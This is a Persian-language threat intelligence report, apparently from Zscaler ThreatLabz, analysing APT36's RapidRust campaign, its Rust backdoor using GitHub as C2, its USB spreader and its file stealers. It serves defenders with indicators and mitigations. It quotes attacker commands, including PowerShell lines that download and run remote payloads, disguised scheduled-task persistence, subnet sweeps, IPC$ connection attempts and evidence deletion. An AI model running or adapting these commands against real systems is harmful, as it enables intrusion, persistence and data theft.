Zscaler ThreatLabz Operation RapidRust: APT36 Deploys RUSTYSHADE, RUSTYMOVE, PSNATCH, and BASHNATCH

عملیات RapidRust: ابزارهای RUSTYSHADE و RUSTYMOVE در حملات APT36

در اوت 2026، مجموعه‌ای از فعالیت‌های تازه و منسجم از سوی گروه تهدید منسوب به پاکستان با نام APT36 علیه سازمان‌های دولتی و حوزه دفاعی در هند و افغانستان مشاهده شد. در این کارزار که تحت عنوان Operation RapidRust رصد شد، مهاجمان تاکتیک‌ها، تکنیک‌ها و رویه‌های خود را به‌روزرسانی کردند و از مجموعه‌ای از ابزارهای جدید شامل درب‌پشتی RUSTYSHADE، ابزار گسترش از طریق رسانه‌های قابل‌حمل RUSTYMOVE، و ابزارهای سرقت فایل PSNATCH و BASHNATCH بهره گرفتند. RUSTYSHADE با سوءاستفاده از مخازن خصوصی GitHub برای فرماندهی و کنترل و رمزنگاری ترافیک C2 با ⁦AES-256-GCM⁩، و RUSTYMOVE با کپی فایل‌های مخرب ازپیش‌جانمایی‌شده روی دیسک‌های USB به‌منظور عبور از شبکه‌های ایزوله (air-gapped)، هسته قابلیت‌های این عملیات را تشکیل دادند.

در جریان این عملیات، مهاجمان علاوه بر استقرار بدافزارهای جدید، فعالیت‌های گسترده‌ای پس از نفوذ انجام دادند که شامل شناسایی سیستم، شبکه و کاربر، پایدارسازی از طریق Scheduled Task، تلاش برای حرکت جانبی با نقشه‌برداری از ماشین‌های فعال و اشتراک‌های شبکه، و پاک‌سازی ردپا بود. همچنین تعدادی دامنه مشابه‌سازی‌شده (typosquatted) برای جاگذاری اسکریپت‌های PowerShell و بارهای بعدی ایجاد شد که رسانه‌های خبری محبوب هندی را جعل می‌کرد.

نکات کلیدی عملیات RapidRust

  • در اوت 2026، فعالیت‌های تازه APT36 علیه نهادهای دولتی و دفاعی در هند و افغانستان مشاهده شد. تمرکز این فعالیت‌ها بر نفوذ، جمع‌آوری اطلاعات و تداوم حضور بود.
  • بدافزار RUSTYSHADE یک درب‌پشتی 64-بیتی مبتنی بر Rust است که از مخازن خصوصی GitHub به‌عنوان کانال C2 استفاده می‌کند و پیام‌ها را با ⁦AES-256-GCM⁩ رمز می‌کند.
  • ابزار RUSTYMOVE یک مؤلفه پس از نفوذ است که فایل‌های مخرب ازپیش‌جانمایی‌شده را به رسانه‌های قابل‌حمل متصل‌شده به ماشین آلوده کپی می‌کند و زمینه انتشار بدافزار به شبکه‌های air-gapped را فراهم می‌سازد.
  • چند دامنه مشابه‌سازی‌شده برای درج اسکریپت‌های PowerShell و بارهای مرحله بعد، با جعل رسانه‌های خبری هندی، ثبت شد.
  • ابزار PSNATCH (PowerShell) برای سرقت فایل در ویندوز و BASHNATCH (bash) برای لینوکس به‌کار رفتند؛ هر دو، فایل‌های با پسوند مشخص و داخل مسیرهای ازپیش‌تعریف‌شده را پیمایش و به مخازن خصوصی GitHub مهاجم ارسال می‌کنند.
  • حرکت جانبی شامل شناسایی میزبان‌های زنده، نگاشت اشتراک‌های شبکه و تلاش برای اتصال به IPC$ با نشست تهی و نیز با اعتبارنامه مشخص انجام گرفت.

تحلیل فنی کارزار و ابزارهای جدید

تحلیل بدافزار RUSTYSHADE

بدافزار RUSTYSHADE یک درب‌پشتی 64-بیتی برای ویندوز و نوشته‌شده با Rust است که مانند برخی کمپین‌های پیشین (که از سازوکار مشابه GITSHELLPAD استفاده می‌کردند) مخازن خصوصی GitHub را به‌عنوان کانال C2 به‌کار می‌گیرد. تفاوت‌های مهم شامل رمزنگاری ارتباطات C2 با ⁦AES-256-GCM⁩، پشتیبانی از مجموعه‌ای از فرمان‌های جدید و انتخاب Rust به‌جای Golang است. این بدافزار در مرحله پس از نفوذ با فرمان PowerShell روی سیستم‌های قربانی جایگذاری شد.

powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip

کانال فرماندهی و کنترل RUSTYSHADE بر مبنای GitHub REST API پیاده‌سازی شده است. یک GitHub personal access token (PAT) به‌صورت متن ساده در باینری هاردکد شده و بدافزار با استفاده از آن در برابر API احراز هویت کرده و با مخزن خصوصی کنترل‌شده از سوی مهاجم تعامل می‌کند. قالب فراخوانی API، هدرهای مورد نیاز و شیوه قالب‌بندی درخواست‌ها مطابق الگوی زیر است.

  • Endpoint Template: ‎https://api.github.com/repos/[owner]/[repo]/contents/[path]?ref=[branch]&t=[timestamp]
  • Authentication: Authorization: token [PAT]
  • Accept: application/vnd.github.v3+json

تمام پیام‌های تبادلی بین RUSTYSHADE و مخزن C2 روی GitHub با ⁦AES-256-GCM⁩ رمز می‌شوند. روند رمزگذاری پیام‌ها به‌این‌ترتیب انجام می‌شد: کلید 32-بایتی AES از SHA256 مربوط به PAT مشتق می‌شد؛ سپس یک nonce تصادفی 12-بایتی با BCryptGenRandom ایجاد و متن با ⁦AES-256-GCM⁩ رمز می‌شد تا متن رمزشده و یک برچسب تأیید اصالت 16-بایتی (authentication tag) تولید کند. داده نهایی با قرار دادن nonce به‌عنوان پیشوند و برچسب 16-بایتی در انتها، به‌شکل nonce[12] || ciphertext || tag[16] قالب‌بندی و سپس ⁦Base64-encode⁩ می‌شد. رشته «HCENC1:» به ابتدای محتوای Base64 افزوده می‌شد تا پیام نهایی با ساختار زیر شکل بگیرد.

HCENC1:[base64(nonce || ciphertext || tag)]

برای رمزگشایی، بدافزار پیشوند HCENC1 را حذف و داده Base64 را دیکد کرده و با ⁦AES-256-GCM⁩ رمزگشایی می‌کرد. همسوسازی (synchronization) بین ماشین آلوده و C2 با نام‌گذاری فایل‌های مشخص در مخزن خصوصی GitHub انجام می‌شد. این فایل‌ها نقش بافر فرمان، خروجی، ضربان حیات و اشیای استخراجی را ایفا می‌کردند.

Filename Purpose
command.txt فرمان‌های C2 به‌صورت رمزشده.
results.txt خروجی فرمان‌ها به‌صورت رمزشده.
info.txt داده‌های شناسایی سیستم.
heartbeat.txt

‏Keep-Alive Beacon با زمان Epoch.

screenshot.png اسکرین‌شات دسکتاپ به‌صورت رمزشده.
webcam_photo.jpg تصویر وب‌کم به‌صورت رمزشده.
download.bin محتوای فایل استخراج‌شده به‌صورت رمزشده.

الگوی تبادل فرمان‌ها بدین‌صورت بود: مهاجم فرمان را با الگوریتم فوق رمز کرده و در فایل command.txt کامیت می‌کرد. بدافزار روی دستگاه آلوده با polling به REST API تغییرات را دریافت و فرمان را بازیابی، رمزگشایی و اجرا کرده و سپس خروجی را دوباره رمز و در فایل results.txt آپلود می‌کرد. قالب فرمان‌ها به‌شکل [COMMAND][:{arg}] بوده و نام فرمان با دو نقطه یا فاصله از آرگومان جدا می‌شد. فهرست فرمان‌های پشتیبانی‌شده در جدول زیر آمده است.

Command Description
ss_up گرفتن اسکرین‌شات با GDI32، ذخیره به PNG و آپلود به‌نام screenshot.png.
CAP-photo گرفتن عکس وب‌کم با WIA.CommonDialog و آپلود به‌نام webcam_photo.jpg.
cd .. تغییر مسیر به شاخه والد.
cd تغییر مسیر کاری به [path].
run اجرای فرمان در پس‌زمینه با CreateProcessW به‌صورت detached.
HC_LIST فهرست‌کردن محتوای مسیر کاری جاری.
HC_DRIVES شمارش حروف درایوهای سیستم.
HC_CD تغییر مسیر کاری با قالب فرمان جایگزین.
HC_CD:this pc نام مستعار برای HC_DRIVES (غیرحساس به بزرگی‌کوچکی).
HC_DOWNLOAD خواندن فایل در [path]، فشرده‌سازی با Compress-Archive، رمزگذاری و آپلود به‌نام download.bin.
(default) اجرای ورودی به‌عنوان فرمان پوسته با ‎%SystemRoot%\System32\cmd.exe‎.

این طراحی مبتنی بر GitHub مزیت پوشش‌پذیری بالا در برابر تحلیل‌های شبکه‌ای را برای مهاجم فراهم می‌کند، زیرا ترافیک به دامنه‌های مشروع و پرترافیک ختم می‌شود و استفاده از PAT خصوصی و رمزنگاری انتهابه‌انتها، تحلیل payload را دشوار می‌کند. از سوی دیگر، وابستگی به فایل‌نام‌های مشخص و روند commit/contents در REST API به مدافعان امکان می‌دهد الگوهای خاص فعالیت را در لاگ‌ها جست‌وجو کنند.

ابزار PowerShell برای سرقت فایل PSNATCH

در مرحله پس از نفوذ، بازیابی یک اسکریپت PowerShell از GitHub gist مهاجم مشاهده شد که PSNATCH نام‌گذاری شده است. کارکرد اصلی PSNATCH سرقت فایل از ماشین آلوده و ارسال آن به مخازن خصوصی GitHub مهاجم بود. این اسکریپت مسیرهای ازپیش‌تعریف‌شده شامل Desktop، Downloads، Documents، OneDrive (نسخه شخصی و تجاری) و درایوهای D: تا H: را به‌صورت بازگشتی پیمایش می‌کرد و بر اساس فهرست گسترده‌ای از پسوندها (شامل اسناد Microsoft Office، تصاویر، آرشیوها، رسانه، فایل‌های اجرایی، اسکریپت‌ها و پایگاه‌های داده) فایل‌ها را انتخاب می‌نمود. زمان آخرین تغییر فایل باید در 120 روز گذشته بود. برای کنترل حجم، سقف 1 GB برای هر فایل و 5 GB برای هر اجرای اسکریپت اعمال شده بود.

فرآیند خروجی‌گیری به‌صورت ارسال مستقیم به مخازن خصوصی مهاجم انجام می‌شد؛ بنابراین، با وجود تکیه بر زیرساخت مشروع، مسیر خروج اطلاعات نسبتاً یکنواخت و قابل ردیابی باقی می‌ماند. این الگو در محیط‌هایی که ترافیک به ‎api.github.com‎ مجاز است، ریسک بالایی ایجاد می‌کند.

ابزار bash برای لینوکس BASHNATCH

BASHNATCH نسخه لینوکسی PSNATCH است و با بهره‌گیری از bash در محیط‌های لینوکسی همان رویکرد را پیاده می‌کند. مسیرها و پسوندهای هدف مشابه نسخه ویندوزی است و برای پیشگیری از ارسال تکراری، فهرست فایل‌های ارسال‌شده را در مسیر زیر نگهداری می‌کرد.

~/.local/share/SmartUploader/uploaded_files.json

این مکانیزم ساده اما کارا، هم تداوم جمع‌آوری را تضمین و هم حجم بی‌رویه ترافیک را کاهش می‌دهد و در نتیجه، کشف مبتنی بر ناهنجاری حجم در برخی سناریوها را دشوارتر می‌کند.

ابزار گسترش از طریق USB با Rust به‌نام RUSTYMOVE

ابزار RUSTYMOVE یک باینری 64-بیتی سبک مبتنی بر Rust است که صرفاً برای مانیتورینگ مداوم رسانه‌های قابل‌حمل خارجی و کپی دو فایل مخرب ازپیش‌جانمایی‌شده به ریشه هر درایو شناسایی‌شده طراحی شده است. هدف از این طراحی، تسهیل انتقال آلودگی از یک میزبان آلوده به سامانه‌های air-gapped از طریق حمل فیزیکی رسانه توسط کاربر است. این ابزار هیچ payload نهفته‌ای در خود ندارد، رمزنگاری نمی‌کند و با زیرساخت C2 ارتباطی برقرار نمی‌کند؛ بنابراین فقط یک مؤلفه حرکت جانبی و تکثیر از طریق USB محسوب می‌شود. وابستگی به مسیرهای ثابت برای دو فایل ازپیش‌جانمایی‌شده نشان می‌دهد RUSTYMOVE احتمالاً در مراحل اولیه توسعه قرار داشت.

دو فایلی که RUSTYMOVE در صورت اتصال درایو خارجی کپی می‌کرد عبارت بودند از:

  • C:\Users\Public\Documents\DriverInstaller.zip که شامل اجرایی RUSTYSHADE بود.
  • C:\Users\Public\Documents\⁦DocScanner-11-Aug-2026-5-37pm.pdf.LNK⁩ که ارزیابی با اطمینان بالا نشان می‌داد هدف آن اجرای RUSTYSHADE استخراج‌شده از DriverInstaller.zip پس از بازگشایی است.

در جریان فعالیت پس از نفوذ، مشاهده شد که RUSTYMOVE با دستورهای زیر روی یک ماشین قربانی قرار داده و پایدارسازی شده است.

cd C:\Users\Public\AccountPictures
dir
powershell wget hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip -o d.zip
dir
tar -xvf d.zip
dir
Start-Process -FilePath ".\⁦Automata-20.exe⁩"
powershell.exe -NoProfile -Command "$t='⁦StandAloneOneDriveUpdater-2626⁩';$a=New-ScheduledTaskAction -Execute 'C:\Users\Public\AccountPictures\⁦Automata-20.exe⁩';$tr=New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME;Register-ScheduledTask -TaskName $t -Action $a -Trigger $tr -User $env:USERNAME -Force"
schtasks /Query /TN "⁦StandAloneOneDriveUpdater-2626⁩" /V /FO LIST

وظیفه زمان‌بندی‌شده ایجادشده RUSTYMOVE را هنگام ورود کاربر اجرا می‌کرد. نام آن، ⁦StandAloneOneDriveUpdater-2626⁩، برای تقلید یک سرویس به‌ظاهر مشروع انتخاب شده بود. فرایند اجرای RUSTYMOVE در یک حلقه بی‌نهایت با مکث 2 ثانیه‌ای بین تکرارها حرکت می‌کرد و دو وظیفه اصلی داشت: کشف درایو خارجی و انتشار فایل.

کشف درایو خارجی با اجرای اسکریپت PowerShell زیر از طریق CreateProcessW انجام می‌شد تا رسانه‌های USB، 1394، SD، MMC و دیسک‌هایی با MediaType قابل‌حمل را استخراج کند.

powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command " Get-Volume | Where-Object DriveLetter | ForEach-Object { $letter = $_.DriveLetter $part = Get-Partition -DriveLetter $letter -ErrorAction SilentlyContinue if (-not $part) { return } $disk = Get-Disk -Number $part.DiskNumber -ErrorAction SilentlyContinue if (-not $disk) { return } $external = ($disk.BusType -in @('USB','1394','SD','MMC')) -or ($disk.MediaType -in @('Removable Media','External hard disk media')) if ($external -and $_.UniqueId) { Write-Output ('{0}|{1}' -f $letter, $_.UniqueId) } } "

خروجی اسکریپت برای رشته‌های حاوی ‎\\?\Volume‎ پارس می‌شد و برای هر درایو معتبر، یک فراخوانی دیگر برای بازیابی UniqueId حجم اجرا می‌گردید.

Get-Volume -DriveLetter [X] -ErrorAction SilentlyContinue | Select-Object -ExpandProperty UniqueId

در مرحله انتشار فایل، بدافزار یک HashMap با کلید UniqueId حجم نگه می‌داشت تا از آلودگی تکراری یک درایو جلوگیری کند. سپس برای هر یک از دو فایل ازپیش‌جانمایی‌شده، نام فایل را استخراج، مسیر مقصد را به‌شکل ‎[DriveLetter]:\[filename]‎ ساخته و اگر فایل در مقصد وجود نداشت، با CopyFileExW کپی می‌کرد. در صورت موفقیت کپی، پیام «Copied: [path]» در log.txt ثبت و اگر کپی جدیدی انجام نمی‌شد، پیام «No new files copied (already on drive, missing source, or copy failed).» نوشته می‌شد. در پایان هر چرخه نیز نتیجه به‌صورت «Success [N] user(s).» در صورت وجود کپی جدید گزارش می‌گردید.

فعالیت‌های پس از نفوذ و زمان‌بندی اجرای فرمان‌ها

تحلیل زمان‌سنجی فرمان‌های C2 نشان داد فرمان‌ها عمدتاً در بازه 4:00 تا 11:00 به‌وقت UTC صادر شدند و کل فعالیت‌های مشاهده‌شده بین 20 اوت 2026 تا 1 سپتامبر 2026 رخ داد. توزیع روزانه فعالیت‌ها نشان داد عملیات در روزهای کاری فعال بود و در دو آخر هفته داخل بازه مورد بررسی، فعالیتی دیده نشد. این الگو با چرخه‌های کاری متعارف سازگار است و می‌تواند نشان‌دهنده عملیات انسانی همزمان باشد.

خلاصه فرمان‌های صادره از سوی عامل تهدید از طریق RUSTYSHADE با دسته‌بندی عملکردی در جدول زیر آمده است. این فرمان‌ها جنبه‌های مختلفی از شناسایی سیستم، شبکه، پایداری، اعتبارسنجی شبکه، حرکت جانبی و پاک‌سازی ردپا را پوشش می‌دهند.

Category C2 commands Description
System Reconnaissance ipconfig, ipconfig /all
whoami, whoami /groups, whoami /priv
echo %COMSPEC%, echo %USERPROFILE%
hostname, tasklist
شناسایی کاربر فعلی، گروه‌ها و امتیازات، فهرست پردازه‌ها، نام میزبان، پیکربندی آداپتور شبکه و مسیر مفسر فرمان.
Network Reconnaissance arp -a
ping -a [IP]
nbtstat -A [IP]
net view, net view \\[IP]
net share, net session
for /L %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | findstr /i \”reply bytes TTL\”
1..254 | ForEach-Object { if (Test-Connection \”192.168.1.$_\” -Count 1 -Quiet -TimeoutSeconds 1) { Write-Host \”UP: 192.168.1.$_\” } }
نقشه‌برداری از شبکه محلی با پویش زیربخش برای میزبان‌های زنده، حل نام معکوس و NetBIOS و شمارش ماشین‌های قابل‌مشاهده و اشتراک‌های SMB.
Geolocation Invoke-RestMethod http://ip-api.com/json | Select-Object lat, lon
curl https://ipinfo.io/json
curl https://ipapi.co/json
بازیابی IP عمومی و مختصات جغرافیایی دستگاه آلوده با APIهای عمومی مکان‌یابی.
Persistence Register-ScheduledTask -TaskName ‘⁦StandAloneOneDriveUpdater-2626⁩’ … -Execute ‘⁦Automata-20.exe⁩’ -Trigger -AtLogOn
schtasks /Create /TN \”⁦StandAloneOneDriveUpdater-2626⁩\” /SC ONLOGON
Register-ScheduledTask -TaskName ‘⁦MicrosoftEdgeUpdateTaskUserS-1-5-24-…⁩’ …
conhost.exe –headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex]
ایجاد وظایف زمان‌بندی برای اجرای payload در هنگام ورود کاربر با نام‌های جعلی مشابه سرویس‌های مشروع OneDrive و Edge.
Persistence Verification schtasks /Query /TN \”⁦StandAloneOneDriveUpdater-2626⁩\” /V /FO LIST
schtasks /Query /FO LIST /V
schtasks /Query /FO TABLE
اعتبارسنجی ثبت موفق وظایف زمان‌بندی‌شده با پرس‌وجوی آن‌ها و بررسی کد خروج.
Network Verification ping -n 1 [IP], ping -n 1 -w 1000 [IP]
for %i in ([list]) do @ping … | findstr \”reply TTL\”
powershell -Command \”Test-NetConnection [IP] -Port 445\”
powershell -Command \”Test-NetConnection [IP] -Port 135\”
بازسنجی میزبان‌های قبلاً کشف‌شده و آزمون پورت‌های SMB 445 و RPC 135 برای انتخاب اهداف مناسب حرکت جانبی.
Lateral Movement net use \\[IP]\\IPC$
net use \\[IP]\\IPC$ /user:[machine_name]\\admin *
تلاش برای اتصال به اشتراک IPC$ ابتدا با نشست تهی و سپس با اعتبارنامه مدیر مشخص.
Anti-Forensics del yogi.zip, del DriverInstaller.exe, del HealthCheck.exe, del sheets_agent.dll, del t_tracker.json, del a.zip, del hh.zip, del ms.zip
ren om.zip DriverInstaller.zip
حذف فایل‌های مربوط به ابزارهای پیش‌تر مستقرشده و تغییر نام برای هموارسازی نشانه‌ها.

زیرساخت و دامنه‌های مشابه‌سازی‌شده

در پشتیبانی زیرساختی از عملیات، علاوه بر تکیه بر سرویس‌های مشروع اینترنتی مانند مخازن خصوصی GitHub برای C2 و سکوی ذخیره‌سازی ابری Backblaze برای میزبانی ابزارهای پس از نفوذ، تعدادی دامنه از طریق NameCheap ثبت شدند که اسکریپت‌های PowerShell میانی و بارهای مرحله بعد روی آن‌ها جاگذاری می‌شد. این دامنه‌ها رسانه‌های خبری شناخته‌شده هندی را جعل می‌کردند.

Malicious domain Legitimate domain Registration date
theprints[.]org theprint.in May 11, 2026
indiatodays[.]org indiatoday.in Aug 17, 2026

این دامنه‌ها برای میزبانی اسکریپت‌های بارگذار PowerShell و انتقال به payloadهای اصلی استفاده شدند. استفاده از نام‌های نزدیک به برندهای خبری معتبر و مسیرهای متنی شبیه سرویس‌های رایج، احتمال کلیک و اجرا توسط کاربر هدف یا عبور از برخی فیلترهای ساده را افزایش می‌دهد.

جمع‌بندی عملیات و ارزیابی تاکتیکی

عملیات RapidRust نشان داد APT36 ضمن حفظ سرعت بالای عملیات علیه اهداف دولت و دفاع در هند و افغانستان، توانسته است سبد ابزار خود را با مؤلفه‌های مبتنی بر Rust گسترش دهد و به‌طور همزمان مسیرهای خروج داده و کانال‌های C2 خود را با تکیه بر سرویس‌های معتبر پنهان کند. RUSTYSHADE با رمزنگاری انتهابه‌انتها و مدیریت فرمان از طریق فایل‌های مخزن خصوصی، شالوده کانال کنترل را تشکیل داده است؛ PSNATCH و BASHNATCH با پوشش ویندوز و لینوکس، دامنه جمع‌آوری را وسیع می‌کنند؛ و RUSTYMOVE مسیر انتشار فیزیکی به شبکه‌های جداافتاده را مهیا می‌سازد.

الگوی زمانی صدور فرمان‌ها و متمرکز بودن فعالیت‌ها در روزهای کاری، با مدل عملیات مبتنی بر اپراتور انسانی و بازه‌های کاری معمول سازگار است. به‌کارگیری Scheduled Task با نام‌های معنادار و شبه‌مشروع از جمله ⁦StandAloneOneDriveUpdater-2626⁩ و عناوینی با برچسب Microsoft Edge Updater، نشان می‌دهد مهاجم به‌دنبال پایداری کم‌سر و صدا و ادغام با عادات مدیریتی میزبان بوده است. تلاش هدفمند برای نقشه‌برداری شبکه و آزمون پورت‌های SMB و RPC نیز گواه قصد آشکار برای حرکت جانبی و نفوذ افقی است.

پوشش شناسایی و نام‌گذاری تهدید

در طبقه‌بندی شناسایی مبتنی بر نام خانواده/ماژول، موارد زیر برای مؤلفه‌های این کارزار گزارش شده است:

  • Win64.Backdoor.RUSTYSHADE.
  • Win64.Spreader.RUSTYMOVE.
  • PS.Malicious.PSNATCH.
  • Linux.Malicious.BASHNATCH.

Indicators Of Compromise

File indicators

Hashes Filename Description
40a75f87f1e52c33df9ca733aaf8ebbb
00aff1a72c5d5635ab36ce2eb370718a7f0557a0
52d07b3ef0c5f27d082551d51027de452682e1fbd5bb38a897ea4b31bd387523
DriverInstaller.zip ZIP archive containing RUSTYSHADE
Ae77f1834ccde53258bc27a779102af2
761ccb15af1c3fe6e4365ddf65578966e4c84fc9
80fdde0dafa450ae33937ccef752b46666da567926b2f39b37e02e77f9d6a92e
DriverInstaller.exe RUSTYSHADE
Aade06ec611d69f1553035f22356ccf4
Ad4afe86a835bb2f7768862d358ebd8324c05902
05bbeea42f481a3dd1b3f670aba481f7c5c8e897ef321d65188317be5a65a4d7
⁦Automata-20.zip⁩ ZIP archive containing RUSTYMOVE
F16f507a8ed515663a4f07050cd97a74
00e1cc0fb1355c196c069791a02b4a5f3b57ae94
70fc6cba3c2021889fb4093d0221dc6925818666df25718a630c562cac18da31
⁦Automata-20.exe⁩ RUSTYMOVE

Network indicators

Type Indicator
Payload staging domain theprints[.]org
Payload staging domain officialinfo[.]org
Payload staging domain indiatodays[.]org
Payload staging URL theprints.]org/adrive
Payload staging URL theprints[.]org/drivefolder
Payload staging URL theprints[.]org/mau
Payload staging URL theprints[.]org/msheets
Payload staging URL theprints[.]org/gsheets
Payload staging URL hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip
Payload staging URL hxxps://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip

نتیجه‌گیری

شواهد گردآوری‌شده در عملیات RapidRust نشان داد APT36 با تمرکز بر اهداف دولت و دفاع در هند و افغانستان، تاکتیک‌های خود را با ابزارهای مبتنی بر Rust، سرقت فایل چندسکویی و گسترش مبتنی بر USB به‌روزرسانی کرده است. اتکا به مخازن خصوصی GitHub برای فرماندهی و کنترل و انتقال داده‌ها، همزمان با رمزنگاری پیام‌ها و استفاده از دامنه‌های مشابه‌سازی‌شده، ترکیبی از اختفا و فریب را برای عبور از کنترل‌های امنیتی فراهم کرده است. هم‌افزایی RUSTYSHADE، PSNATCH/BASHNATCH و RUSTYMOVE نشان می‌دهد مهاجم در پی زنجیره عملیاتی کامل از نفوذ تا جمع‌آوری و انتشار فراتر از مرزهای شبکه‌های متداول بوده است.

برای تیم‌های امنیتی سازمانی، پایش درخواست‌ها به ‎api.github.com‎ با الگوهای رفتاری ناهنجار، ممیزی Scheduled Taskهای کاربرمحور با نام‌های شبه‌مشروع، سدگذاری در برابر اجرای اسکریپت‌های PowerShell دریافتی از دامنه‌های غیرمعتبر، و سیاست‌گذاری رسانه‌های قابل‌حمل می‌تواند در کشف و مهار چنین کارزارهایی تعیین‌کننده باشد. همچنین انطباق مداوم IoCها با کنترل‌های دفاعی و مسدودسازی دامنه‌ها و مسیرهای شناخته‌شده در این گزارش ضروری است.

مطالب مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

انتخاب مسیریاب

برای مسیریابی یکی از اپلیکیشن های زیر را انتخاب کنید.